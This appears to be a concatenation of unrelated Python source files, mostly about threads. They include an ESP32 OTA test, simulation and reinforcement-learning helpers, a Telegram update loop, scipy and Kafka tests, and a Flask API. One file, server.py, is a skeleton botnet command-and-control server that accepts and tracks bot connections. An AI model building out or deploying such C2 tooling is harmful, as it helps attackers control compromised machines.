ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
if __name__ == '__main__':
test_examples_protocol_native_ota_example()
test_examples_protocol_native_ota_example_chunked()
test_examples_protocol_native_ota_example_truncated_bin()
test_examples_protocol_native_ota_example_truncated_header()
test_examples_protocol_native_ota_example_random()
|
simulator.py
|
# SIM-CITY webservice
#
# Copyright 2015 Joris Borgdorff <j.borgdorff@esciencecenter.nl>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import simcity
from picas.documents import Task
from numbers import Number
import multiprocessing as mp
import traceback
class Simulator(object):
"""
SIM-CITY simulator
"""
def __init__(self, ensemble, version, command, scoring, host, max_jobs=4,
polling_time=60, argnames=None, argprecisions=None,
couchdb=None, use_cache=False):
self.couchdb = couchdb
self.ensemble = ensemble
self.version = version
self.command = command
self.scoring = scoring
self.host = host
self.max_jobs = max_jobs
self.default_host = host
self.polling_time = polling_time
self.argnames = argnames
self.argprecisions = argprecisions
self.use_cache = use_cache
self.current_pid = 0
self.proc_q = mp.Queue()
self.proc = {}
def _keyval(self, p, i):
try:
key = self.argnames[i]
except (TypeError, IndexError):
key = str(i)
try:
value = p[i] - (p[i] % self.argprecisions[i])
except (TypeError, IndexError):
value = p[i]
return (key, value)
def __call__(self, p, host=None):
if host is None:
host = self.default_host
kwargs = dict(self._keyval(p, i) for i in range(len(p)))
task = None
if self.use_cache:
js_input = ""
for key in kwargs:
if isinstance(kwargs[key], Number):
js_input += "&& doc.input['%s'] == %f" % (key, kwargs[key])
else:
js_input += "&& doc.input['%s'] == '%s'" % (
key, str(kwargs[key]))
map_fun = '''function(doc) {
if (doc.type == 'task' && doc.done > 0 &&
doc.command == '%s' && doc.version == '%s' %s) {
emit(doc._id, doc)
}
}''' % (self.command, self.version, js_input)
for row in simcity.get_task_database().db.query(map_fun, limit=1):
task = Task(row.value)
print("using cache")
if task is None:
task, job = simcity.run_task({
'command': self.command,
'version': self.version,
'input': kwargs,
'ensemble': self.ensemble,
}, self.host, self.max_jobs, polling_time=self.polling_time)
if task.has_error():
raise EnvironmentError('Simulation %s failed: %s'
% (task.id, str(task.get_errors())))
return self.scoring(task)
def start(self, p, host=None):
self.current_pid += 1
self.proc[self.current_pid] = mp.Process(
target=run_simulator, args=(self, self.current_pid, p, host,))
self.proc[self.current_pid].start()
return self.current_pid
def join(self):
pid, value = self.proc_q.get()
self.proc[pid].join()
del self.proc[pid]
return (pid, value,)
def has_result(self):
return not self.proc_q.empty()
def is_running(self):
return len(self.proc) > 0 or self.has_result()
def run_simulator(simulator, pid, p, host):
try:
# reinitialize database connections in each thread
simcity.init(simcity.get_config())
value = simulator(p, host)
simulator.proc_q.put((pid, value,))
except Exception as ex:
traceback.print_exc()
simulator.proc_q.put((pid, ex,))
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
import time
import sys
sys.path.append("/home/jupyter/Notebooks/Chang/HardRLWithYoutube")
USE_IMMITATION_ENV = True
if USE_IMMITATION_ENV:
print(sys.path)
from TDCFeaturizer import TDCFeaturizer
from train_featurizer import generate_dataset
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
if USE_IMMITATION_ENV:
self.featurizer = TDCFeaturizer(92, 92, 84, 84, feature_vector_size=1024, learning_rate=0, experiment_name='default')
self.featurizer.load()
video_dataset = generate_dataset('default', framerate=30/15, width=84, height=84)[0]
self.featurized_dataset = self.featurizer.featurize(video_dataset)
self.checkpoint_indexes = [0] * nenvs
self.rewards = 0
self.counter = 0
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
obs, rews, dones = np.stack(obs), np.stack(rews), np.stack(dones)
print("obs shape: ", obs.shape)
if USE_IMMITATION_ENV:
state_feature_vectors = self.featurizer.featurize(obs)
dot_products = [np.dot(state_feature_vectors[i], self.featurized_dataset[self.checkpoint_indexes[i]]) for i in range(self.nenvs)]
gamma_threshold = 0.5
immitation_rewards = [0.5 if dot_product > gamma_threshold else 0 for dot_product in dot_products]
rews += immitation_rewards
mean_rews = np.mean(rews)
self.rewards += mean_rews
self.counter += 1
if self.counter == 10000:
print('10000 rewards: ', self.rewards)
self.rewards = 0
self.counter = 0
#if dot_products[0] > 0.5:
# print(dot_products, immitation_rewards[0], rews)
self.checkpoint_indexes = [self.checkpoint_indexes[i] + 1 if immitation_rewards[i] > 0 else self.checkpoint_indexes[i] for i in range(self.nenvs)]
#print(self.checkpoint_indexes[0])
self.checkpoint_indexes = [0 if dones[i] else self.checkpoint_indexes[i] for i in range(self.nenvs)]
return obs, rews, dones, infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
self.checkpoint_indexes = [0] * self.nenvs
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
if self.viewer is not None:
self.viewer.close()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
bigimg = tile_images(imgs)
if mode == 'human':
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(bigimg[:, :, ::-1])
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
|
server.py
|
# Date: 09/28/2017
# Author: Ethical-H4CK3R
# Description: CnC Server
import time
import socket
import threading
class Server(object):
''' Command & Control '''
def __init__(self):
self.server = None
self.server_status = False
def kill(self, session):
try:
session.shutdown(socket.SHUT_RDWR)
session.close()
except:pass
def disconnect(self, exit=False):
if exit:
print '\n[-] Exiting ...'
time.sleep(2.5)
self.server_status = False
self.alive = False
self.ping = False
self.kill(self.server)
del self.botnet[:]
def cncServer(self):
while self.alive and self.server_status:
try:
session, ip = self.server.accept()
threading.Thread(target=self.addBot, args=[session]).start()
except socket.timeout:pass
except:self.restartServer
def startServer(self, verbose=True):
try:
if self.server_status:self.restartServer();return
if verbose:print 'Starting server on {}:{} ...'.format(self.ip, self.port)
time.sleep(2.5)
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((self.ip, self.port))
self.server.settimeout(0.5)
self.server.listen(1)
self.server_status = True
self.activeIP = self.ip
self.activePort = self.port
threading.Thread(target=self.cncServer).start()
except:
print '[-] Error: Failed to start server, validate you IP address and try again'
def stopServer(self, verbose=True):
try:
if not self.server_status:return
if verbose:print 'Stopping server ...'
time.sleep(2.5)
self.disconnect()
except:
print '[-] Error: Failed to stop server'
def restartServer(self):
try:
if not self.server_status:self.startServer();return
print 'Restarting server on {}:{} ...'.format(self.ip, self.port)
time.sleep(2.5)
self.stopServer(False)
self.startServer(False)
except:pass
|
loop.py
|
import sys
import time
import json
import threading
import traceback
import collections
try:
import Queue as queue
except ImportError:
import queue
from . import exception
from . import _find_first_key, flavor_router
class RunForeverAsThread(object):
def run_as_thread(self, *args, **kwargs):
t = threading.Thread(target=self.run_forever, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class CollectLoop(RunForeverAsThread):
def __init__(self, handle):
self._handle = handle
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self):
while 1:
try:
msg = self._inqueue.get(block=True)
self._handle(msg)
except:
traceback.print_exc()
class GetUpdatesLoop(RunForeverAsThread):
def __init__(self, bot, on_update):
self._bot = bot
self._update_handler = on_update
def run_forever(self, relax=0.1, offset=None, timeout=20, allowed_updates=None):
"""
Process new updates in infinity loop
:param relax: float
:param offset: int
:param timeout: int
:param allowed_updates: bool
"""
while 1:
try:
result = self._bot.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_updates)
# Once passed, this parameter is no longer needed.
allowed_updates = None
# No sort. Trust server to give messages in correct order.
for update in result:
self._update_handler(update)
offset = update['update_id'] + 1
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def _dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def _dictify27(data):
if type(data) in [str, unicode]:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
_dictify = _dictify3 if sys.version_info >= (3,) else _dictify27
def _extract_message(update):
key = _find_first_key(update, ['message',
'edited_message',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query',
'my_chat_member',
'chat_member',])
return key, update[key]
def _infer_handler_function(bot, h):
if h is None:
return bot.handle
elif isinstance(h, dict):
return flavor_router(h)
else:
return h
class MessageLoop(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._handle = _infer_handler_function(bot, handle)
def run_forever(self, *args, **kwargs):
"""
:type relax: float
:param relax: seconds between each :meth:`.getUpdates`
:type offset: int
:param offset:
initial ``offset`` parameter supplied to :meth:`.getUpdates`
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`.getUpdates`, controlling
how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`.getUpdates`,
controlling which types of updates to receive.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
collectloop = CollectLoop(self._handle)
updatesloop = GetUpdatesLoop(self._bot,
lambda update:
collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
# feed events to collect loop
self._bot.scheduler.on_event(collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
updatesloop.run_as_thread(*args, **kwargs)
collectloop.run_forever() # blocking
class Webhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
def run_forever(self):
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._collectloop.run_forever()
def feed(self, data):
update = _dictify(data)
self._collectloop.input_queue.put(_extract_message(update)[1])
class Orderer(RunForeverAsThread):
def __init__(self, on_ordered_update):
self._on_ordered_update = on_ordered_update
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self, maxhold=3):
def handle(update):
self._on_ordered_update(update)
return update['update_id']
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
update = self._inqueue.get(block=True, timeout=qwait)
if max_id is None:
# First message received, handle regardless.
max_id = handle(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = handle(update)
# clear contagious updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft()) # updates that arrived earlier, handle them.
else:
break # gap, no more contagious updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
# Update arrives pre-maturely, insert to buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id']-max_id-1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
if qwait < 0:
qwait = 0
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
class OrderedWebhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
self._orderer = Orderer(lambda update:
self._collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
def run_forever(self, *args, **kwargs):
"""
:type maxhold: float
:param maxhold:
The maximum number of seconds an update is held waiting for a
not-yet-arrived smaller ``update_id``. When this number of seconds
is up, the update is delivered to the message-handling function
even if some smaller ``update_id``\s have not yet arrived. If those
smaller ``update_id``\s arrive at some later time, they are discarded.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._orderer.run_as_thread(*args, **kwargs)
self._collectloop.run_forever()
def feed(self, data):
"""
:param data:
One of these:
- ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
"""
update = _dictify(data)
self._orderer.input_queue.put(update)
|
condition_objects_03.py
|
import threading
from random import randint
from time import sleep
from queue import Queue
queue_resource = Queue()
condition = threading.Condition(lock=threading.Lock())
def producer() -> None:
for i in range(2):
sleep(3)
condition.acquire()
resource: str = f'resource_{randint(0, 10)}'
queue_resource.put(resource)
print(f'producer {threading.current_thread().name} -> {resource} produced')
condition.notify()
condition.release()
def consumer() -> None:
condition.acquire()
print(f'consumer {threading.current_thread().name} -> waiting resource')
condition.wait()
print(f'consumer {threading.current_thread().name} -> {queue_resource.get()} consumed')
condition.release()
thread_producer = threading.Thread(name='thread_producer', target=producer)
thread_consumer_1 = threading.Thread(name='thread_consumer_1', target=consumer)
thread_consumer_2 = threading.Thread(name='thread_consumer_2', target=consumer)
thread_producer.start()
thread_consumer_1.start()
thread_consumer_2.start()
|
test_ccallback.py
|
from numpy.testing import assert_equal, assert_
from pytest import raises as assert_raises
import time
import pytest
import ctypes
import threading
from scipy._lib import _ccallback_c as _test_ccallback_cython
from scipy._lib import _test_ccallback
from scipy._lib._ccallback import LowLevelCallable
try:
import cffi
HAVE_CFFI = True
except ImportError:
HAVE_CFFI = False
ERROR_VALUE = 2.0
def callback_python(a, user_data=None):
if a == ERROR_VALUE:
raise ValueError("bad value")
if user_data is None:
return a + 1
else:
return a + user_data
def _get_cffi_func(base, signature):
if not HAVE_CFFI:
pytest.skip("cffi not installed")
# Get function address
voidp = ctypes.cast(base, ctypes.c_void_p)
address = voidp.value
# Create corresponding cffi handle
ffi = cffi.FFI()
func = ffi.cast(signature, address)
return func
def _get_ctypes_data():
value = ctypes.c_double(2.0)
return ctypes.cast(ctypes.pointer(value), ctypes.c_voidp)
def _get_cffi_data():
if not HAVE_CFFI:
pytest.skip("cffi not installed")
ffi = cffi.FFI()
return ffi.new('double *', 2.0)
CALLERS = {
'simple': _test_ccallback.test_call_simple,
'nodata': _test_ccallback.test_call_nodata,
'nonlocal': _test_ccallback.test_call_nonlocal,
'cython': _test_ccallback_cython.test_call_cython,
}
# These functions have signatures known to the callers
FUNCS = {
'python': lambda: callback_python,
'capsule': lambda: _test_ccallback.test_get_plus1_capsule(),
'cython': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1_cython"),
'ctypes': lambda: _test_ccallback_cython.plus1_ctypes,
'cffi': lambda: _get_cffi_func(_test_ccallback_cython.plus1_ctypes,
'double (*)(double, int *, void *)'),
'capsule_b': lambda: _test_ccallback.test_get_plus1b_capsule(),
'cython_b': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1b_cython"),
'ctypes_b': lambda: _test_ccallback_cython.plus1b_ctypes,
'cffi_b': lambda: _get_cffi_func(_test_ccallback_cython.plus1b_ctypes,
'double (*)(double, double, int *, void *)'),
}
# These functions have signatures the callers don't know
BAD_FUNCS = {
'capsule_bc': lambda: _test_ccallback.test_get_plus1bc_capsule(),
'cython_bc': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1bc_cython"),
'ctypes_bc': lambda: _test_ccallback_cython.plus1bc_ctypes,
'cffi_bc': lambda: _get_cffi_func(_test_ccallback_cython.plus1bc_ctypes,
'double (*)(double, double, double, int *, void *)'),
}
USER_DATAS = {
'ctypes': _get_ctypes_data,
'cffi': _get_cffi_data,
'capsule': _test_ccallback.test_get_data_capsule,
}
def test_callbacks():
def check(caller, func, user_data):
caller = CALLERS[caller]
func = FUNCS[func]()
user_data = USER_DATAS[user_data]()
if func is callback_python:
func2 = lambda x: func(x, 2.0)
else:
func2 = LowLevelCallable(func, user_data)
func = LowLevelCallable(func)
# Test basic call
assert_equal(caller(func, 1.0), 2.0)
# Test 'bad' value resulting to an error
assert_raises(ValueError, caller, func, ERROR_VALUE)
# Test passing in user_data
assert_equal(caller(func2, 1.0), 3.0)
for caller in sorted(CALLERS.keys()):
for func in sorted(FUNCS.keys()):
for user_data in sorted(USER_DATAS.keys()):
check(caller, func, user_data)
def test_bad_callbacks():
def check(caller, func, user_data):
caller = CALLERS[caller]
user_data = USER_DATAS[user_data]()
func = BAD_FUNCS[func]()
if func is callback_python:
func2 = lambda x: func(x, 2.0)
else:
func2 = LowLevelCallable(func, user_data)
func = LowLevelCallable(func)
# Test that basic call fails
assert_raises(ValueError, caller, LowLevelCallable(func), 1.0)
# Test that passing in user_data also fails
assert_raises(ValueError, caller, func2, 1.0)
# Test error message
llfunc = LowLevelCallable(func)
try:
caller(llfunc, 1.0)
except ValueError as err:
msg = str(err)
assert_(llfunc.signature in msg, msg)
assert_('double (double, double, int *, void *)' in msg, msg)
for caller in sorted(CALLERS.keys()):
for func in sorted(BAD_FUNCS.keys()):
for user_data in sorted(USER_DATAS.keys()):
check(caller, func, user_data)
def test_signature_override():
caller = _test_ccallback.test_call_simple
func = _test_ccallback.test_get_plus1_capsule()
llcallable = LowLevelCallable(func, signature="bad signature")
assert_equal(llcallable.signature, "bad signature")
assert_raises(ValueError, caller, llcallable, 3)
llcallable = LowLevelCallable(func, signature="double (double, int *, void *)")
assert_equal(llcallable.signature, "double (double, int *, void *)")
assert_equal(caller(llcallable, 3), 4)
def test_threadsafety():
def callback(a, caller):
if a <= 0:
return 1
else:
res = caller(lambda x: callback(x, caller), a - 1)
return 2*res
def check(caller):
caller = CALLERS[caller]
results = []
count = 10
def run():
time.sleep(0.01)
r = caller(lambda x: callback(x, caller), count)
results.append(r)
threads = [threading.Thread(target=run) for j in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert_equal(results, [2.0**count]*len(threads))
for caller in CALLERS.keys():
check(caller)
|
test_sink_integration.py
|
import threading
from typing import Callable, Dict, List, Tuple
from unittest import mock
import pytest
from pyconnect.config import SinkConfig
from pyconnect.core import Status
from .utils import PyConnectTestSink, TestException, compare_lists_unordered
ConnectSinkFactory = Callable[..., PyConnectTestSink]
@pytest.fixture
def connect_sink_factory(
running_cluster_config: Dict[str, str], topic_and_partitions: Tuple[str, int]
) -> ConnectSinkFactory:
"""
Creates a factory, that can be used to create readily usable instances of :class:`test.utils.PyConnectTestSink`.
If necessary, any config parameter can be overwritten by providing a custom config as argument to the factory.
"""
topic_id, partitions = topic_and_partitions
group_id = topic_id + "_sink_group_id"
sink_config = SinkConfig(
{
"bootstrap_servers": running_cluster_config["broker"],
"schema_registry": running_cluster_config["schema-registry"],
"offset_commit_interval": 1,
"group_id": group_id,
"poll_timeout": 2,
"topics": topic_id,
}
)
def connect_sink_factory_(custom_config=None):
if custom_config is not None:
config = sink_config.copy()
config.update(custom_config)
else:
config = sink_config
test_sink = PyConnectTestSink(config)
test_sink.max_runs = 30
return test_sink
return connect_sink_factory_
@pytest.mark.integration
def test_message_consumption(produced_messages: List[Tuple[str, dict]], connect_sink_factory: ConnectSinkFactory):
connect_sink = connect_sink_factory()
connect_sink.run()
compare_lists_unordered(produced_messages, connect_sink.flushed_messages)
@pytest.mark.integration
def test_offset_commit_on_restart(produced_messages: List[Tuple[str, dict]], connect_sink_factory: ConnectSinkFactory):
def patch_commit(sink: PyConnectTestSink) -> mock.Mock:
old_func = sink._consumer.commit
mocked_func = mock.Mock(name="commit", wraps=old_func)
sink._consumer.commit = mocked_func
return mocked_func
connect_sink = connect_sink_factory()
commit_mock = patch_commit(connect_sink)
connect_sink.run()
expected_call = commit_mock.call_args
compare_lists_unordered(produced_messages, connect_sink.flushed_messages)
connect_sink = connect_sink_factory()
commit_mock = patch_commit(connect_sink)
connect_sink.max_idle_count = 2
connect_sink.run()
assert len(expected_call[1]["offsets"]) > 0, f"No offsets commited during commit! {expected_call}"
assert expected_call == commit_mock.call_args
@pytest.mark.integration
def test_continue_after_crash(produced_messages: List[Tuple[str, dict]], connect_sink_factory: ConnectSinkFactory):
connect_sink = connect_sink_factory({"kafka_opts": {"max.poll.interval.ms": 10000, "session.timeout.ms": 6000}})
connect_sink.with_method_raising_after_n_calls("on_message_received", TestException(), 7)
connect_sink.with_mock_for("close")
with pytest.raises(TestException):
connect_sink.run()
flushed_messages = connect_sink.flushed_messages
connect_sink = connect_sink_factory()
connect_sink.run()
flushed_messages.extend(connect_sink.flushed_messages)
compare_lists_unordered(produced_messages, flushed_messages)
@pytest.mark.integration
def test_two_sinks_one_failing(
topic_and_partitions: Tuple[str, int], produced_messages: List[Tuple[str, dict]], connect_sink_factory
):
_, partitions = topic_and_partitions
if partitions == 1:
return # we need to test multiple consumers on multiple partitions for rebalancing issues
conf = {"offset_commit_interval": 2}
failing_sink = connect_sink_factory(conf)
failing_sink.with_method_raising_after_n_calls("on_message_received", TestException(), 3)
failing_sink.with_wrapper_for("on_message_received")
running_sink = connect_sink_factory(conf)
running_sink.with_wrapper_for("on_message_received")
running_sink.max_idle_count = 5
running_sink_thread = threading.Thread(target=running_sink.run, name="RUNNING Sink")
failing_sink_thread = threading.Thread(target=failing_sink.run, name="FAILING Sink")
running_sink_thread.start()
failing_sink_thread.start()
running_sink_thread.join()
failing_sink_thread.join()
assert running_sink.on_message_received.called, "Running sink should have received messages"
assert failing_sink.on_message_received.called, "Failing sink should have received messages"
assert len(failing_sink.flushed_messages) == 2, "Only messages before crash should be flushed"
assert failing_sink.status == Status.CRASHED
assert isinstance(failing_sink.status_info, TestException)
assert running_sink.status == Status.STOPPED
flushed_messages = running_sink.flushed_messages + failing_sink.flushed_messages
compare_lists_unordered(produced_messages, flushed_messages)
|
hot.py
|
import json
import time
from . import api
from flask import jsonify
from threading import Thread
def cache_hot(api, spider_fuc, key):
"""
缓存热榜信息
:param api:
:return:
"""
try:
result = spider_fuc()
output = {
'code': 0,
'msg': '成功',
'data': result
}
except Exception as e:
api.logger.error(e)
output = {
'code': 1111,
'msg': '获取热榜失败',
'data': [],
}
output = json.dumps(output)
api.redis_con.set(key, output, ex=str(60*60)) # 缓存1小时
@api.route('/<re(".*"):key>')
def get_hot_lists(key):
"""
知乎热榜api
http://127.0.0.1:5000/api/v1_0/zhihu
:return:
"""
if not hasattr(api.hot_spider, key):
return '404 Not Found', 404
spider_func = getattr(api.hot_spider, key)
t1 = Thread(target=cache_hot, args=(api, spider_func, key))
t1.start()
# 不等待执行结束即向下执行, 为了加快显示速度先忽略掉内容是否更新
while True:
result = api.redis_con.get(key)
if not result:
time.sleep(0.1)
continue
output = json.loads(result)
return jsonify(output)
@api.route('/forums')
def get_forum_names():
"""
获取支持的论坛name
:return:
"""
output = [
{'name': '知乎', 'code': 'zhihu'},
{'name': '微博', 'code': 'weibo'},
{'name': '百度贴吧', 'code': 'baidutieba'},
{'name': 'v2ex', 'code': 'v2ex'},
{'name': '天涯', 'code': 'tianya'},
{'name': '豆瓣', 'code': 'douban'},
{'name': '网易新闻', 'code': 'wangyinews'},
# {'name': '煎蛋', 'code': 'jiandan'},
{'name': '黑客派', 'code': 'heikepai'},
{'name': 'it之家', 'code': 'ithome'},
]
return jsonify(output)
|
pricewars_merchant.py
|
from abc import ABCMeta, abstractmethod
import time
import threading
import hashlib
import base64
from typing import Optional, List
from api import Marketplace, Producer
from server import MerchantServer
from models import SoldOffer, Offer
class PricewarsMerchant(metaclass=ABCMeta):
def __init__(self, port: int, token: Optional[str], marketplace_url: str, producer_url: str, name: str):
self.settings = {
'update interval': 5,
'restock limit': 20,
'order threshold': 0,
'shipping': 5,
'primeShipping': 1,
}
self.state = 'running'
self.server_thread = self.start_server(port)
self.marketplace = Marketplace(token, host=marketplace_url)
self.marketplace.wait_for_host()
if token:
self.token = token
self.merchant_id = self.calculate_id(token)
else:
register_response = self.marketplace.register(port, name)
self.token = register_response.merchant_token
self.merchant_id = register_response.merchant_id
self.producer = Producer(self.token, host=producer_url)
@staticmethod
def calculate_id(token: str) -> str:
return base64.b64encode(hashlib.sha256(token.encode('utf-8')).digest()).decode('utf-8')
def run(self):
start_time = time.time()
while True:
if self.state == 'running':
self.update_offers()
# Waiting for the length of the update interval minus the execution time
time.sleep(self.settings['update interval'] -
((time.time() - start_time) % self.settings['update interval']))
def update_offers(self) -> None:
"""
Entry point for regular merchant activity.
When the merchant is running, this is called in each update interval.
"""
market_situation = self.marketplace.get_offers()
own_offers = [offer for offer in market_situation if offer.merchant_id == self.merchant_id]
inventory_level = sum(offer.amount for offer in own_offers)
if inventory_level <= self.settings['order threshold']:
self.restock(inventory_level, market_situation)
for offer in own_offers:
offer.price = self.calculate_price(offer.offer_id, market_situation)
self.marketplace.update_offer(offer)
def restock(self, inventory_level, market_situation):
order = self.producer.order(self.settings['restock limit'] - inventory_level)
